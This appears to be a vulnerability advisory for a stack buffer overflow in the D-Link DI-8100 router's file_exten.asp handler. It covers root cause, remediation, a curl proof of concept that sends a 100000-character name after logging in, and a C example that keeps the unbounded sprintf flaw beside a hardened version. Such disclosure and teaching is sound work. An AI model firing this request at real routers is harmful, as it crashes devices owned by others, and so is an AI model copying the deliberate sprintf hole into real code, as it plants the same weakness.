# Vulnerability Summary: DI-8100 Router file_exten.asp Stack Buffer Overflow

## 1. Vulnerability Overview

* **Vulnerability Type**: Stack-based Buffer Overflow (CWE-121)
* **Affected Component**: The `file_exten.asp` CGI handler in the DI-8100 router firmware (`/cgi-bin/file_exten.asp`)
* **Trigger Condition**: Processing a file-extension configuration operation (`opt=add` or `opt=mod`) whose `name` parameter is an overly long string.
* **Root Cause**: The handler behind `file_exten.asp` uses `sprintf` to copy the user-supplied `name` parameter (`parm_12` in the decompiled code) into a fixed-size stack buffer with no length check. A name longer than the buffer overwrites the control data saved above it on the stack (on MIPS, the saved return address and saved frame pointer), which is what makes the bug exploitable rather than just a crash.

## 2. Impact Scope

* **Vendor**: D-Link (OEM manufacturer of the DI-8100)
* **Product**: DI-8100 Multi-WAN VPN Router
* **Firmware Version**: Confirmed in the analyzed firmware image; the exact version was not recorded, and all currently released versions may be affected.
* **Attack Vector**:
  * **Remote**: Yes (HTTP POST to the management interface)
  * **Authentication**: Required (a valid administrator session cookie)
  * **Attack Path**: POST to `/file_exten.asp` with `opt=add` or `opt=mod` and an oversized `name` parameter.
* **Potential Consequences**: Arbitrary code execution on the router, full device compromise, denial of service (crash of the web server or the device), or use of the router as a pivot for lateral movement into the internal network.

## 3. Remediation

* **Recommendation**: Enforce a strict maximum length on the `name` parameter in the `file_exten.asp` handler before any copy, and reject (rather than truncate) over-long values. Replace `sprintf` with a bounded alternative such as `snprintf` and check its return value: `snprintf` on its own only truncates and does not signal that the input was invalid.
* **Temporary Mitigation**: If the firmware cannot be patched immediately, restrict access to the management interface (and `/cgi-bin/file_exten.asp` in particular) so that only trusted administrator hosts can reach it, and make sure the default administrator password has been changed, since the bug is only reachable with a valid session.

## 4. Proof-of-Concept (PoC) Code
Post-authentication crash test, following the request shape described in section 2. The target address and the `admin`/`admin` credentials are placeholders to be adjusted for the device under test.

```bash
# CVE-DI-8100-file_exten_sprintf
TARGET="192.168.0.1"

# 1. Log in and keep the session cookie (the bug is only reachable with a valid admin session).
curl -c /tmp/cookie -d "user=admin&password=admin" "http://$TARGET/login.cgi"

# 2. Send an oversized name (100000 x 'A') to the add operation.
#    The handler copies it into a stack buffer with sprintf, so the request
#    crashes the web server or the device; opt=mod behaves the same way.
PAYLOAD=$(python -c 'print("A"*100000)')
curl -X POST "http://$TARGET/file_exten.asp" -b /tmp/cookie -d "opt=add&name=$PAYLOAD"
```
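As an added illustration (this is not the DI-8100 firmware code, which the advisory describes only from decompilation), the C below models the `file_exten.asp` handler: the unbounded `sprintf` copy from section 1 next to the length-validated, return-value-checked `snprintf` version recommended in section 3. The buffer size `EXT_NAME_MAX`, the character rules for an extension name, the status codes and every function name are assumptions made for this example.

```c
/*
 * Added example, not code from the DI-8100 firmware: a model of the
 * file_exten.asp handler showing the vulnerable sprintf pattern next to
 * a hardened version. EXT_NAME_MAX, the character rules, the status
 * codes and the function names are illustrative assumptions.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define EXT_NAME_MAX 31   /* assumed: longest extension name the UI accepts */

enum ext_status {
    EXT_OK = 0,
    EXT_ERR_OPT = -1,       /* opt is neither "add" nor "mod" */
    EXT_ERR_EMPTY = -2,
    EXT_ERR_TOO_LONG = -3,
    EXT_ERR_BAD_CHAR = -4
};

/*
 * Vulnerable shape described in the advisory: parm_12 (the `name` POST
 * parameter) is written into a fixed stack buffer with an unbounded
 * sprintf. A name longer than EXT_NAME_MAX overwrites the saved registers
 * and return address above `buf`, so this must never see untrusted input.
 */
int file_exten_vulnerable(const char *parm_12)
{
    char buf[EXT_NAME_MAX + 1];
    sprintf(buf, "%s", parm_12);          /* CWE-121: no length check */
    return (int)strlen(buf);
}

/* Length of s, reading at most max+1 bytes so a huge input is cheap to reject. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n <= max && s[n] != '\0')
        n++;
    return n;                             /* n == max+1 means "longer than max" */
}

/* Validate the name before anything is copied. Reject rather than truncate:
 * a silently shortened extension is a different filter rule than the one
 * the administrator submitted. */
int validate_ext_name(const char *name)
{
    if (name == NULL || name[0] == '\0')
        return EXT_ERR_EMPTY;
    size_t len = bounded_len(name, EXT_NAME_MAX);
    if (len > EXT_NAME_MAX)
        return EXT_ERR_TOO_LONG;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '_' && c != '-')
            return EXT_ERR_BAD_CHAR;
    }
    return EXT_OK;
}

/*
 * Hardened handler: check opt, validate the name, then copy with an explicit
 * bound and check snprintf's return value (the length it wanted to write).
 * That check is what turns snprintf from "quietly truncates" into a guard.
 */
int file_exten_hardened(const char *opt, const char *parm_12,
                        char *out, size_t out_len)
{
    if (opt == NULL || (strcmp(opt, "add") != 0 && strcmp(opt, "mod") != 0))
        return EXT_ERR_OPT;
    int st = validate_ext_name(parm_12);
    if (st != EXT_OK)
        return st;
    int n = snprintf(out, out_len, "%s", parm_12);
    if (n < 0 || (size_t)n >= out_len) {
        out[0] = '\0';                    /* never leave a half-written name */
        return EXT_ERR_TOO_LONG;
    }
    return EXT_OK;
}

/* Feed the hardened handler a name of `n` bytes of 'A' (the shape of the
 * PoC payload) and report the status it returns. */
int hardened_status_for_length(size_t n)
{
    char *name = malloc(n + 1);
    if (name == NULL)
        return EXT_ERR_EMPTY;
    memset(name, 'A', n);
    name[n] = '\0';
    char out[EXT_NAME_MAX + 1];
    int st = file_exten_hardened("add", name, out, sizeof out);
    free(name);
    return st;
}

int main(void)
{
    char out[EXT_NAME_MAX + 1];
    printf("short name:   %d\n", file_exten_hardened("add", "torrent", out, sizeof out));
    printf("100000 x 'A': %d\n", hardened_status_for_length(100000));
    return 0;
}
```

Build with `gcc -Wall example.c`. The vulnerable function is kept only to show the shape of the bug; feeding it the PoC payload corrupts the stack in this program exactly as it does on the router. Note that `snprintf` without the length validation and return-value check would silently turn the 100000-byte payload into a 31-character rule: safe against the overflow, but still accepting input the administrator never intended.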